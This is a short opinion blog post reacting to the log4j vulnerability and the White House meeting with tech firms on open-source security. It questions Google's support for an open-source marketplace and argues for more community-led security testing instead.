Government calls action on opensource, Google volunteers to support a marketplace approach to opensource
Opensource and security
In the stunning flash darkness of the log4j vulnerability exploitation, which was one of the largest attacks spawned off by attackers which has never been in such a large scale, the white house had called for a meeting of minds from giant corporations including google, HP , IBM and others. Log4J vulnerability impacted a large tech community including various corporations which enabled attackers to remote control corporate servers. A JNDI flaw in the opensource tool log4j which is an apache software, was an eye opener for the world. This event has provoked the tech community to take several actions on opensource implementations across which included re-validations of such usages. There is no one way or other, opensource is the way to move ahead to breakthrough innovations but given the magnitude of attacks that are happening, one may want to conduct methodical testing before any type of implementations.
Google opened that more funding needs to be made available to opensource initiatives and that a marketplace is being called for and google supports this initiative. While rigorous testing is done by not one part of the enterprise where a few engineers test the system, opensource is tested in real time by several hundred people or even thousands of people during each of their implementations. The same bug report is presented to the community who picks-up and resolves it, retests it again to be release to the public again. This cycle is much better than a small group testing within. Google is asking for continuous testing. Not sure what that means. But what needs to be done is to intensify security level testing. Let there be cybersecurity testers as contributors. Let opensource cybersecurity experts get deeply involved. In short let all directions, specifications including hosting it securely also be done by the opensource community. A marketplace may not be the right approach as that marketplace approach will then create fight for financial gains and perhaps could destroy the opensource kingdom from where the entire innovation chain will also break and make a disastrous fall.
Do you think differently or have an opinion? write your comments.
RiverLog Software Editorial
